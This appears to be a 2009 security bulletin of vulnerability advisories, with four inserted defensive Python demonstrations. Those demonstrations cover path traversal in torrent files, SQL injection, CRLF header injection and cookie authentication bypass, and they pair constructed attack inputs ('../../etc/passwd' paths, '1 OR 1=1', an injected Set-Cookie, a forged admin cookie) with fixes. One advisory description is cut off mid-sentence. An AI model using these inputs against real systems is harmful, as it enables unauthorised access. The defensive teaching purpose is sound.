  • 09.24.33 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Derivco ActiveX Control Unspecified Security
  • Description: Derivco ActiveX control is prone to an unspecified security vulnerability. The ActiveX control can be identified by CLSID: D8089245-3211-40F6-819B-9E5E92CD61A2. Attackers may exploit this issue by enticing an unsuspecting victim to view a malicious webpage.
  • Ref: http://www.microsoft.com/technet/security/advisory/969898.mspx

  • 09.24.34 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris Kerberos Credential Management Security Bypass
  • Description: Solaris Kerberos is exposed to a security-bypass issue that affects the Kerberos credential cache management. Successful exploitation may allow a local attacker to gain unauthorized access to Kerberized NFS mount points.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-252787-1

  • 09.24.35 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun OpenSolaris "idmap(1M)" Local Denial of Service
  • Description: Sun OpenSolaris is a UNIX-based operating system. OpenSolaris is exposed to a local denial of service issue. Specifically, an unspecified problem in the idmap(1M) command can allow local users to kill the "idmapd(1M)" daemon on a CIFS (Common Internet File System/Windows file service) server. OpenSolaris builds snv_88 through snv_110 are affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-260508-1

  • 09.24.36 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris "rpc.nisd(1M)" Daemon NIS+ Server Remote Denial of Service
  • Description: Sun Solaris "rpc.nisd(1M)" daemon may allow remote attackers to crash an instance of the NIS+ server. Specifically, an unspecified error in the "rpc.nisd(1M)" allows remote attackers to exploit this issue to cause the NIS+ service to stop responding to further requests from NIS+ clients. Sun Solaris 8, Solaris 9, Solaris 10, and OpenSolaris based upon builds snv_01 through snv_103 are affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-256748-1

  • 09.24.37 - CVE: Not Available
  • Platform: Aix
  • Title: IBM AIX "portmapper" Remote Denial of Service
  • Description: IBM AIX is a UNIX-based operating system. AIX is exposed to a remote denial of service issue in an unspecified function of "libtli" in the "portmapper" service. AIX version 5.3 is affected.
  • Ref: http://www.securityfocus.com/bid/35211

  • 09.24.38 - CVE: CVE-2009-1196
  • Platform: Unix
  • Title: CUPS Scheduler Directory Services Remote Denial of Service
  • Description: CUPS (Common UNIX Printing System) is a widely used set of printing utilities for UNIX-based systems. The application is exposed to a denial of service issue caused by a use-after-free error. This issue affects the scheduler directory services routine. The attacker can exploit this issue to crash the affected application, denying service to legitimate users.
  • Ref: https://bugzilla.redhat.com/show_bug.cgi?id=497135

  • 09.24.39 - CVE: CVE-2009-0791
  • Platform: Unix
  • Title: CUPS PDF File Multiple Heap Buffer Overflow Vulnerabilities
  • Description: CUPS (Common UNIX Printing System) is a widely used set of printing utilities for UNIX-based systems. CUPS is exposed to multiple remote heap-based buffer overflow issues because it fails to properly bounds check user-supplied input before copying it into a finite-sized buffer. Specifically, the problem occurs in the CUPS "pdftops" filter when handling malformed PDF documents.
  • Ref: https://bugzilla.redhat.com/show_bug.cgi?id=491840

  • 09.24.40 - CVE: CVE-2009-0033
  • Platform: Cross Platform
  • Title: Apache Tomcat Java AJP Connector Invalid Header Denial of Service
  • Description: Apache Tomcat is a Java-based webserver for multiple operating systems. Tomcat is exposed to a denial of service issue that occurs when the Java AJP connector receives a request containing invalid headers. This will cause the "mod_jk" load balancing worker to fall into an invalid state.
  • Ref: http://www.securityfocus.com/archive/1/504044

  • 09.24.41 - CVE: CVE-2009-0580
  • Platform: Cross Platform
  • Title: Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
  • Description: Apache Tomcat is exposed to a username enumeration weakness because it returns different responses to login attempts depending on whether or not the username exists. Specifically, this issue occurs when Form Authentication is enabled and the server is configured to use any of the following authentication realms: MemoryRealm, DataSourceRealm, or JDBCRealm.
  • Ref: http://www.securityfocus.com/archive/1/504125

  • 09.24.42 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Hitachi Web Server Reverse Proxy Denial of Service
  • Description: Hitachi Web Server is a web application server available for multiple operating systems. Hitachi Web Server is exposed to a denial of service issue because the reverse proxy function fails to properly handle invalid responses from a remote backend server. Attackers may exploit this issue to cause denial of service conditions.
  • Ref: http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS07-039/index.html

  • 09.24.43 - CVE: CVE-2009-0023
  • Platform: Cross Platform
  • Title: Apache APR-util "apr_strmatch_precompile()" Integer Underflow
  • Description: Apache "APR-util" is a library of utility functions used by several software applications, including the Apache HTTP server. "APR-util" is exposed to an integer-underflow issue. This error affects the "apr_strmatch_precompile()" function in the "strmatch/apr_strmatch.c" source file. "APR-util" versions prior to 1.3.5 are affected.
  • Ref: http://svn.apache.org/viewvc?view=rev&revision=779880

  • 09.24.44 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Online Armor Personal Firewall IOCTL Request Local Privilege Escalation
  • Description: Online Armor Personal Firewall is a security suite for Microsoft Windows operating systems. The application is exposed to a local privilege escalation issue because the "OAmon.sys" device driver fails to properly validate user-supplied addresses when it processes IOCTL requests. Online Armor Personal Firewall versions 3.5.0.12 and earlier are affected.
  • Ref: http://www.ntinternals.org/ntiadv0806/ntiadv0806.html

  • 09.24.45 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun GlassFish Enterprise Server HTTP Engine/Admin Interface Local Denial of Service
  • Description: Sun GlassFish Enterprise Server is a web application framework. The software is exposed to a local denial of service issue that affects the HTTP Engine and the administration interface. GlassFish Enterprise Server version 2.1 is affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-258528-1

  • 09.24.46 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Libpng 1-bit Interlaced Images Information Disclosure
  • Description: The "libpng" library is a PNG reference library. The library is exposed to an information disclosure issue that stems from an error in parsing crafted 1-bit (2-color) interlaced images whose widths are not divisible by 8. This may allow an attacker to obtain several uninitialized bits from certain rows of the interlaced images. libpng versions prior to 1.2.37 are affected.
  • Ref: http://www.securityfocus.com/bid/35233

  • 09.24.47 - CVE: Not Available
  • Platform: Cross Platform
  • Title: XM Easy Personal FTP Server Multiple Command Remote Buffer Overflow Vulnerabilities
  • Description: XM Easy Personal FTP Server is an FTP server application available for Microsoft Windows. The application is exposed to multiple remote buffer overflow issues because the software fails to sufficiently sanitize user-supplied arguments to the "HELP" and "TYPE" FTP commands. XM Easy Personal FTP Server version 5.7.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/504122

  • 09.24.48 - CVE: Not Available
  • Platform: Cross Platform
  • Title: HP Discovery and Dependency Mapping Inventory Unauthorized Access
  • Description: HP Discovery and Dependency Mapping Inventory (DDMI) is an asset management application. The software is exposed to an unspecified unauthorized-access issue that affects the RGS Sender when running Easy Login.
  • Ref: http://www.securityfocus.com/bid/35250

  • 09.24.49 - CVE: CVE-2009-1956
  • Platform: Cross Platform
  • Title: Apache APR-util "apr_brigade_vprintf" Off By One
  • Description: Apache "APR-util" is a library of utility functions used by several software applications, including the Apache HTTP server. Apache "APR-util" is exposed to an off-by-one issue that may allow attackers to obtain sensitive information or trigger a denial of service condition. This issue results from a design error and affects the "apr_brigade_vprintf" function of the library. "APR-util" versions prior to 1.3.5 on big-endian platforms are affected.
  • Ref: http://www.apache.org/dist/apr/CHANGES-APR-UTIL-1.3

  • 09.24.50 - CVE: CVE-2009-1955
  • Platform: Cross Platform
  • Title: Apache APR-util "xml/apr_xml.c" Denial of Service
  • Description: Apache "APR-util" is a library of utility functions used by several software applications, including the Apache HTTP server. Apache "APR-util" is exposed to a denial of service issue. Specifically, the issue affects the expat XML parser in the "apr_xml_*" interface of the "xml/apr_xml.c" file. "APR-util" versions prior to 1.3.7 are affected.
  • Ref: http://www.apache.org/dist/apr/CHANGES-APR-UTIL-1.3

  • 09.24.51 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Serene Bach Session Hijacking
  • Description: Serene Bach is a Japanese blogging application. The application is exposed to a session-hijacking issue. The application fails to protect session identifiers and may create predictable session ID sequences. This may allow an attacker to gain access to the affected application by guessing a valid session ID. Serene Bach versions prior to 2.21R are affected.
  • Ref: http://www.securityfocus.com/bid/35254

  • 09.24.52 - CVE: Not Available
  • Platform: Cross Platform
  • Title: wxWidgets Multiple Security Vulnerabilities
  • Description: wxWidgets is a library and API for creating GUI applications on multiple platforms. The library is exposed to multiple security issues. Exploiting these issues may allow remote attackers to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial of service.
  • Ref: http://svn.wxwidgets.org/svn/wx/wxWidgets/branches/WX_2_8_BRANCH/docs/changes.txt

  • 09.24.53 - CVE: CVE-2009-1718, CVE-2009-1715, CVE-2009-1714, CVE-2009-1713, CVE-2009-1712, CVE-2009-1711, CVE-2009-1710, CVE-2009-1709, CVE-2009-1703, CVE-2009-1702, CVE-2009-1701, CVE-2009-1700, CVE-2009-1699, CVE-2009-1698, CVE-2009-1697, CVE-2009-1696, CVE-2009-1695
  • Platform: Cross Platform
  • Title: Apple Safari Prior to 4.0 Multiple Security Vulnerabilities
  • Description: Apple Safari is a web browser available for Mac OS X and Microsoft Windows. Safari is exposed to multiple security issues. Attackers may exploit these issues to execute arbitrary code, launch cross-site scripting attacks, elevate privileges, or obtain sensitive information. Safari versions prior to 4.0 running on Apple Mac OS X
  • Ref: http://www.zerodayinitiative.com/advisories/ZDI-09-034/

  • 09.24.54 - CVE: CVE-2009-1760
  • Platform: Cross Platform
  • Title: Rasterbar Software libtorrent Arbitrary File Overwrite
  • Description: The "libtorrent" library is a BitTorrent library available for multiple platforms. The library is exposed to an arbitrary file overwrite issue that occurs due to a failure to handle malformed data contained in a ".torrent" BitTorrent file. Specifically, the library fails to properly validate "path" elements used to specify file locations. libtorrent versions prior to 0.14.4 are affected.
  • Ref: http://census-labs.com/news/2009/06/08/libtorrent-rasterbar/
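The entry above describes the general shape of this bug class: a metainfo file supplies the path elements of every file it will write, and a client that joins them onto the download directory without checking them can be made to write outside it. The block below is an added example and is not libtorrent code; the minimal bencode decoder, the element checks, the default "downloads" directory and the two constructed .torrent byte strings are this example's own assumptions. It rejects empty, ".", "..", separator-bearing and NUL-bearing elements, and then re-checks the resolved target against the download directory so a stray symlink cannot undo the first check.

```python
"""Added example: validating per-file "path" lists from .torrent metainfo
before any file is created. Not libtorrent code; the bencode decoder and
the two constructed torrents below belong to this example only."""
import os


def bdecode(data: bytes):
    """Minimal bencode decoder (ints, byte strings, lists, dicts)."""
    def parse(i):
        c = data[i:i + 1]
        if c == b"i":                                # integer: i<digits>e
            end = data.index(b"e", i)
            return int(data[i + 1:end]), end + 1
        if c == b"l":                                # list: l<items>e
            items, i = [], i + 1
            while data[i:i + 1] != b"e":
                item, i = parse(i)
                items.append(item)
            return items, i + 1
        if c == b"d":                                # dict: d<key><value>...e
            result, i = {}, i + 1
            while data[i:i + 1] != b"e":
                key, i = parse(i)
                value, i = parse(i)
                result[key] = value
            return result, i + 1
        colon = data.index(b":", i)                  # byte string: <len>:<bytes>
        length = int(data[i:colon])
        start = colon + 1
        return data[start:start + length], start + length

    value, used = parse(0)
    if used != len(data):
        raise ValueError("trailing bytes after bencoded value")
    return value


def safe_file_path(download_dir: str, name: bytes, path_elems) -> str:
    """Join torrent name + path elements under download_dir, or raise."""
    cleaned = []
    for raw in [name, *path_elems]:
        if not isinstance(raw, bytes):
            raise ValueError("path element is not a byte string")
        elem = raw.decode("utf-8")
        # Reject empty, ".", ".." and any element carrying a separator or NUL;
        # "/" also catches absolute paths, "\\" catches Windows separators.
        if elem in ("", ".", "..") or any(ch in elem for ch in "/\\\x00"):
            raise ValueError(f"illegal path element {elem!r}")
        cleaned.append(elem)
    base = os.path.realpath(download_dir)
    target = os.path.realpath(os.path.join(base, *cleaned))
    # Second line of defence: even if an earlier file left a symlink behind,
    # the resolved target must still sit inside the download directory.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes download directory")
    return target


def file_targets(metainfo: bytes, download_dir: str) -> list:
    """Absolute target path of every file the torrent would write."""
    info = bdecode(metainfo)[b"info"]
    name = info[b"name"]
    if b"files" not in info:                         # single-file torrent
        return [safe_file_path(download_dir, name, [])]
    return [safe_file_path(download_dir, name, f[b"path"]) for f in info[b"files"]]


def check_torrent(metainfo: bytes, download_dir: str = "downloads"):
    """(True, targets) if every path is safe, else (False, reason); no disk I/O."""
    try:
        return True, file_targets(metainfo, download_dir)
    except (ValueError, KeyError, TypeError) as exc:
        return False, str(exc)


# Constructed metainfo (assumption): a benign nested path, and one using "..".
BENIGN_TORRENT = b"d4:infod5:filesld6:lengthi3e4:pathl3:sub5:a.txteee4:name4:demoee"
TRAVERSAL_TORRENT = b"d4:infod5:filesld6:lengthi3e4:pathl2:..2:..3:etc6:passwdeee4:name4:demoee"

if __name__ == "__main__":
    print(check_torrent(BENIGN_TORRENT))
    print(check_torrent(TRAVERSAL_TORRENT))
```

The element check alone would stop the ".." case; the realpath/commonpath comparison is there for the case the page does not spell out, where a file created earlier in the same torrent is a symlink and a later, individually clean path resolves through it.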

  • 09.24.55 - CVE: CVE-2009-1697
  • Platform: Cross Platform
  • Title: WebKit "XMLHttpRequest" HTTP Response Splitting
  • Description: WebKit is a browser framework used in multiple applications, including Apple Safari and Google Chrome browsers. WebKit is exposed to an HTTP response-splitting issue because it fails to adequately sanitize user-supplied input. This issue can occur because CRLF characters may be injected into "XMLHttpRequest" headers. When the request does not contain a "Host" header, the same-origin policy can be bypassed, allowing attacker-supplied JavaScript to interact with other sites hosted on the same server.
  • Ref: http://www.securityfocus.com/archive/1/504187

  • 09.24.56 - CVE: CVE-2009-1690
  • Platform: Cross Platform
  • Title: WebKit DOM Event Handler Remote Memory Corruption
  • Description: WebKit is a browser framework used in multiple applications, including Apple Safari and Google Chrome browsers. WebKit is exposed to a remote memory corruption issue because it fails to handle recursion over unspecified DOM events. Very few details are available regarding this issue.
  • Ref: http://googlechromereleases.blogspot.com/2009/06/stable-update-2-webkit-security-fixes.html

  • 09.24.57 - CVE: CVE-2008-5515
  • Platform: Cross Platform
  • Title: Apache Tomcat "RequestDispatcher" Information Disclosure
  • Description: Apache Tomcat is a Java-based web server for multiple operating systems. The application is exposed to a remote information disclosure issue that exists in the "RequestDispatcher". An attacker can exploit this issue by constructing and submitting a specially crafted request parameter. Apache Tomcat versions 6.0.0 through 6.0.18, 5.5.0 through 5.5.27 and 4.1.0 through 4.1.39 are affected.
  • Ref: http://www.fujitsu.com/global/support/software/security/products-f/interstage-200902e.html

  • 09.24.58 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM OS/400 JVA-RUN JDK6.0 XML Digital Signature Unspecified Security
  • Description: IBM OS/400 is an operating system for IBM Power systems. IBM OS/400 is exposed to an unspecified issue that occurs due to an error in the XML Digital Signature verification process. IBM OS/400 versions V6R1M0 and V5R4M0 are affected.
  • Ref: http://www-01.ibm.com/support/docview.wss?uid=nas2e858199605d67111862575cc003c7276

  • 09.24.59 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PDFlib Lite PNG Image Size Integer Overflow
  • Description: PDFlib Lite is a library used to construct PDF files. The library is exposed to an integer overflow issue because it fails to perform adequate boundary checks on user-supplied data before using it to allocate memory buffers. This issue occurs when processing malformed PNG images. PDFlib Lite versions prior to 7.0.4p4 are affected.
  • Ref: http://www.securityfocus.com/bid/35266

  • 09.24.60 - CVE: CVE-2009-1420
  • Platform: Cross Platform
  • Title: HP OpenView Network Node Manager SNMP and MIB Unspecified Remote Code Execution
  • Description: HP OpenView Network Node Manager (NNM) is a fault management application for IP networks. The application is exposed to a remote code execution issue caused by an unspecified error. This issue occurs when the application is configured with SNMP (Simple Network Management Protocol) and MIB (Management Information Base). NNM versions 7.51 and 7.53 are affected.
  • Ref: http://www.securityfocus.com/archive/1/504183

  • 09.24.61 - CVE: CVE-2009-1718
  • Platform: Cross Platform
  • Title: WebKit Drag Event Remote Information Disclosure
  • Description: WebKit is a browser framework used in multiple applications, including Apple Safari and Google Chrome browsers. WebKit is exposed to a remote information disclosure issue related to the drag-and-drop functionality. Specifically, this issue allows a malicious webpage to access sensitive information when content is dragged across the browser window.
  • Ref: http://googlechromereleases.blogspot.com/2009/06/stable-update-2-webkit-security-fixes.html

  • 09.24.62 - CVE: CVE-2009-2011
  • Platform: Cross Platform
  • Title: Worldweaver DX Studio Player Browser Plugin Remote Arbitrary Shell Command Injection
  • Description: Worldweaver DX Studio is a development environment for creating 3D graphics. The Player application is a browser plugin used for displaying DX Studio documents in Internet Explorer or Firefox. The application is exposed to a remote command injection issue because it fails to adequately sanitize user-supplied input data. Specifically, commands sent to the "shell.execute()" method will execute without warning in the Firefox plugin. DX Studio Player versions prior to 3.0.29.1 are affected.
  • Ref: http://www.coresecurity.com/content/DXStudio-player-firefox-plugin

  • 09.24.63 - CVE: CVE-2009-1162
  • Platform: Web Application - Cross Site Scripting
  • Title: IronPort AsyncOS Spam Quarantine Login Cross-Site Scripting
  • Description: Cisco IronPort appliances are used for email and web security. IronPort AsyncOS is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input. This issue affects the "referrer" parameter to the Spam Quarantine login page. IronPort series C, M, and X appliances running AsyncOS versions prior to 6.5.2 are affected.
  • Ref: http://tools.cisco.com/security/center/viewAlert.x?alertId=18365

  • 09.24.64 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Sun Java System Web Server Reverse Proxy Plug-in Cross-Site Scripting
  • Description: Sun Java System Web Server is an enterprise-level web server application. The application is exposed to a cross-site scripting issue because it fails to properly sanitize unspecified user-supplied input to the Reverse Proxy plug-in. Sun Java System Web Server version 6.1 on SPARC, x86, Linux, Windows, HP-UX, and AIX platforms is affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-259588-1

  • 09.24.65 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: moziloCMS Multiple Cross-Site Scripting Vulnerabilities
  • Description: moziloCMS is a web-based content manager implemented in PHP. The application is exposed to multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied data to the "cat" and "file" parameters of the "admin/index.php" script when the "action" parameter is set to "editsite". moziloCMS version 1.11.1 is affected.
  • Ref: http://www.securityfocus.com/archive/1/504091

  • 09.24.66 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Kerio MailServer WebMail Cross-Site Scripting
  • Description: Kerio MailServer is a mail manager used as an alternative to Microsoft Exchange. WebMail is a mail client for the Kerio MailServer. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input. This issue affects the Integration page. Kerio MailServer versions 6.6.0, 6.6.1, 6.6.2, and 6.7.0 are affected.
  • Ref: http://www.kerio.com/support/security-advisories#0906

  • 09.24.67 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Seminar for Joomla! "id" Parameter SQL Injection
  • Description: Seminar for Joomla! is an event booking component for the Joomla! content manager. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "com_seminar" component before using it in an SQL query. Seminar for Joomla! version 1.28 is affected.
  • Ref: http://www.securityfocus.com/bid/35192

  • 09.24.68 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! and Mambo "com_mosres" Component Multiple SQL Injection Vulnerabilities
  • Description: The "com_momres" component is a PHP-based application for the Mambo and Joomla! content managers. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "property_uid" and "regID" parameters of the "com_momres" component before using it in an SQL query. "com_momres" version 1.0f is affected.
  • Ref: http://www.milw0rm.com/exploits/8872

  • 09.24.69 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! ComSchool Component "classid" Parameter SQL Injection
  • Description: ComSchool is an education component for the Joomla! content manager. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "classid" parameter of the "com_school" component before using it in an SQL query. ComSchool version 1.4 is affected.
  • Ref: http://www.securityfocus.com/bid/35257

  • 09.24.70 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! AkoBook Component "Itemid" Parameter SQL Injection
  • Description: AkoBook is a guestbook component for the Joomla! content manager. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "Itemid" parameter of the "com_akobook" component before using it in an SQL query. AkoBook SE version 2.3 is affected.
  • Ref: http://www.securityfocus.com/bid/35268
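The four SQL injection entries above share one root cause: a numeric request parameter ("id", "property_uid", "regID", "classid", "Itemid") is pasted into the query text. The block below is an added example written for this bulletin, not code from any of the Joomla! or Mambo components listed; the in-memory SQLite table, its column names and the payload are constructed for the demonstration. It shows the string-built query leaking rows the WHERE clause was meant to hide, and the fix of casting to an integer and binding the value so the SQL text never changes.

```python
"""Added example: SQL injection through an integer id parameter, the
string-built query beside the parameterised one. Not component code."""
import sqlite3

# Constructed table (assumption) standing in for a component's rows; the
# "private" flag is what the WHERE clause is supposed to enforce.
_conn = sqlite3.connect(":memory:")
_conn.executescript(
    """
    CREATE TABLE items(id INTEGER PRIMARY KEY, title TEXT, private INTEGER);
    INSERT INTO items VALUES (1, 'public seminar', 0);
    INSERT INTO items VALUES (2, 'board meeting',  1);
    INSERT INTO items VALUES (3, 'payroll review', 1);
    """
)


def fetch_vulnerable(item_id: str) -> list:
    """Builds the query from the raw parameter, so the parameter can rewrite
    the WHERE clause: '1 OR 1=1' turns it into (private=0 AND id=1) OR 1=1."""
    sql = f"SELECT id, title FROM items WHERE private = 0 AND id = {item_id}"
    return _conn.execute(sql).fetchall()


def fetch_fixed(item_id: str) -> list:
    """Cast to int first, then bind the value with a placeholder. The SQL
    text is constant; the database never parses attacker bytes as SQL."""
    try:
        ident = int(item_id, 10)
    except ValueError:
        raise ValueError(f"id must be an integer, got {item_id!r}") from None
    sql = "SELECT id, title FROM items WHERE private = 0 AND id = ?"
    return _conn.execute(sql, (ident,)).fetchall()


INJECTION = "1 OR 1=1"   # constructed attacker input


def demo():
    """Rows leaked by the vulnerable query, and whether the fix rejects it."""
    leaked = fetch_vulnerable(INJECTION)
    try:
        fetch_fixed(INJECTION)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, rejected


if __name__ == "__main__":
    print(demo())
```

Binding alone would already defeat the payload; the explicit int() cast is kept because it turns a malformed id into a clean error at the edge instead of a type error deep in the data layer, which is also the signal worth logging.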

  • 09.24.71 - CVE: Not Available
  • Platform: Web Application
  • Title: Luottokunta Payment Security Bypass
  • Description: Luottokunta is a payment module for osCommerce. Luottokunta is exposed to a security bypass issue. This issue is due to an unspecified design error when processing orders. Attackers can exploit this issue to make a purchase without paying. Successfully exploiting this issue may lead to other attacks. Luottokunta versions prior to 1.3 are affected.
  • Ref: http://www.cert.fi/haavoittuvuudet/2009/haavoittuvuus-2009-046.html

  • 09.24.72 - CVE: Not Available
  • Platform: Web Application
  • Title: Drupal Webform Module HTML Injection
  • Description: Webform is a Drupal module that is used to create questionnaires, contact forms, surveys, and other forms. The application is exposed to an HTML injection issue because it fails to sufficiently sanitize user-supplied input before using it in dynamically generated content. The issue occurs when displaying results of a Webform input submission. Webform versions prior to 5.x-2.7 and 6.x-2.7 are affected.
  • Ref: http://drupal.org/node/481268

  • 09.24.73 - CVE: Not Available
  • Platform: Web Application
  • Title: Omilen Photo Gallery Joomla! Component "controller" Parameter Local File Include
  • Description: Omilen Photo Gallery is a component for the Joomla! content manager. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "controller" parameter of the "com_omphotogallery" component. Omilen Photo Gallery version 0.5b is affected.
  • Ref: http://www.securityfocus.com/bid/35201

  • 09.24.74 - CVE: Not Available
  • Platform: Web Application
  • Title: LightNEasy Multiple HTML Injection Vulnerabilities
  • Description: LightNEasy is a web-based content manager. The application is exposed to multiple HTML injection issues because it fails to sufficiently sanitize user-supplied data to the following parameters: "commentmessage", "commentemail" and "commentname". LightNEasy versions 2.2.1 no database and 2.2.2 SQLite are affected.
  • Ref: http://forum.intern0t.net/intern0t-advisories/1081-intern0t-lightneasy-2-2-2-html-injection-vulnerability.html

  • 09.24.75 - CVE: Not Available
  • Platform: Web Application
  • Title: LogMeIn "cfgadvanced.html" HTTP Header Injection
  • Description: LogMeIn is a remote access application with a web interface. The application is exposed to an issue that allows attackers to inject arbitrary HTTP headers because it fails to sanitize input. Specifically, the application fails to strip CRLF characters from the "lang" parameter passed to the "cfgadvanced.html" script. LogMeIn version 4.0.784 is affected.
  • Ref: http://securethoughts.com/2009/06/multiple-vulnerabilities-in-logmein-web-interface-can-be-used-to-control-your-computer-and-steal-arbitary-files/
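This entry and the WebKit "XMLHttpRequest" entry (09.24.55) are the same defect on opposite sides of the connection: a CR/LF pair copied into a header lets the sender terminate one header and start another. The block below is an added example, not code from LogMeIn, WebKit or this bulletin; the "Content-Language" header built from the "lang" parameter, the constructed payload and the naive header parser are assumptions made for the demonstration. It shows the split response a concatenating handler produces and the single check (no control characters in a value, token characters only in a name) that closes both the response-side and the request-side variant.

```python
"""Added example: CRLF header injection, the concatenating handler beside
the validating one. Not vendor code; the header and payload are assumed."""
import re

# A header value may contain printable ASCII and TAB only; CR and LF are
# what let a value end one header and begin another.
_SAFE_VALUE = re.compile(r"^[\t\x20-\x7e]*$")
# Header names are RFC 7230 tokens: no spaces, colons or control characters.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def build_response_vulnerable(lang: str) -> bytes:
    """Copies the parameter straight into the header block."""
    head = (
        "HTTP/1.1 200 OK\r\n"
        f"Content-Language: {lang}\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
    )
    return head.encode("latin-1") + b"<html>ok</html>"


def is_safe_value(value: str) -> bool:
    return bool(_SAFE_VALUE.match(value))


def header_value(value: str) -> str:
    """Return the value unchanged if it is a legal single-line value, else raise.
    Rejecting is preferable to stripping: a stripped payload still hides
    an attack attempt that should be logged."""
    if not is_safe_value(value):
        raise ValueError("control character in header value")
    return value


def header_name(name: str) -> str:
    if not _TOKEN.match(name):
        raise ValueError("illegal header name")
    return name


def build_response_hardened(lang: str) -> bytes:
    head = (
        "HTTP/1.1 200 OK\r\n"
        f"{header_name('Content-Language')}: {header_value(lang)}\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
    )
    return head.encode("latin-1") + b"<html>ok</html>"


def parse_headers(raw: bytes) -> dict:
    """Parse the header block the way a naive client does: split on CRLF."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


PAYLOAD = "en\r\nSet-Cookie: session=attacker"   # constructed attacker input


def demo():
    """Headers the client sees from the vulnerable build, and whether the
    hardened build refused the same input."""
    injected = parse_headers(build_response_vulnerable(PAYLOAD))
    try:
        build_response_hardened(PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return injected, blocked


if __name__ == "__main__":
    print(demo())
```

The same two functions apply to a client library setting request headers from script-controlled strings, which is the WebKit case: validate the name as a token and the value as control-character-free before the bytes are written, rather than relying on the peer to notice.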

  • 09.24.76 - CVE: Not Available
  • Platform: Web Application
  • Title: Ideal MooFAQ Joomla! Component "file_includer.php" Local File Include
  • Description: MooFAQ is a component for the Joomla! content manager. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "file" parameter of the "file_includer.php" script in the "com_moofaq" component. MooFAQ version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/35259

  • 09.24.77 - CVE: Not Available
  • Platform: Web Application
  • Title: Automated Link Exchange Portal Insecure Cookie Authentication Bypass
  • Description: Automated Link Exchange Portal is a web application. The application is exposed to an authentication bypass issue because it fails to adequately verify user-supplied input used for cookie-based authentication. Specifically, attackers can gain administrative access to the application by setting a "userid" cookie with the value "1" and a cookie "path" attribute of "/", so that the browser sends it for every page. Automated Link Exchange Portal version 1.3 is affected.
  • Ref: http://www.securityfocus.com/bid/35261
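
The entry above is a textbook case of trusting a client-settable identifier. The following added example (not the portal's code) shows the vulnerable check beside a cookie whose userid is bound to a server-side HMAC so it cannot be altered. The cookie name and the forged value "1" come from the advisory; the key, the user table and the signing scheme are constructed.

```python
"""Cookie-based authentication bypass beside a signed-cookie fix.

Added example, not Automated Link Exchange Portal's code. Cookie name and
forged value from the advisory; key, users and scheme are constructed.
"""
import hashlib
import hmac
import secrets

# Constructed user table: id 1 is the administrator, as in the advisory.
USERS = {
    "1": {"name": "admin", "is_admin": True},
    "42": {"name": "bob", "is_admin": False},
}

# Constructed key; a real deployment loads a persistent secret from config.
SERVER_KEY = secrets.token_bytes(32)

# What the attacker's browser sends after setting userid=1 with path=/.
FORGED_COOKIES = {"userid": "1"}


def current_user_vulnerable(cookies):
    """The bypass: the user id is read from the cookie and believed."""
    return USERS.get(cookies.get("userid"))


def _tag(uid):
    return hmac.new(SERVER_KEY, uid.encode(), hashlib.sha256).hexdigest()


def issue_cookie(uid):
    """Set at login: 'uid.hmac(uid)'. The client can read the id but cannot
    produce a valid tag for any other id without SERVER_KEY."""
    return "%s.%s" % (uid, _tag(uid))


def current_user_safe(cookies):
    token = cookies.get("userid", "")
    uid, _, tag = token.partition(".")
    if not uid or not tag:
        return None
    # Constant-time comparison so the tag cannot be guessed byte by byte.
    if not hmac.compare_digest(_tag(uid).encode(), tag.encode()):
        return None
    return USERS.get(uid)


def tampered_cookie(cookie, new_uid):
    """Attacker keeps bob's valid tag but swaps the id in front of it."""
    _, _, tag = cookie.partition(".")
    return "%s.%s" % (new_uid, tag)


if __name__ == "__main__":
    print("vulnerable:", current_user_vulnerable(FORGED_COOKIES))
    print("safe:      ", current_user_safe(FORGED_COOKIES))
    print("bob:       ", current_user_safe({"userid": issue_cookie("42")}))
```

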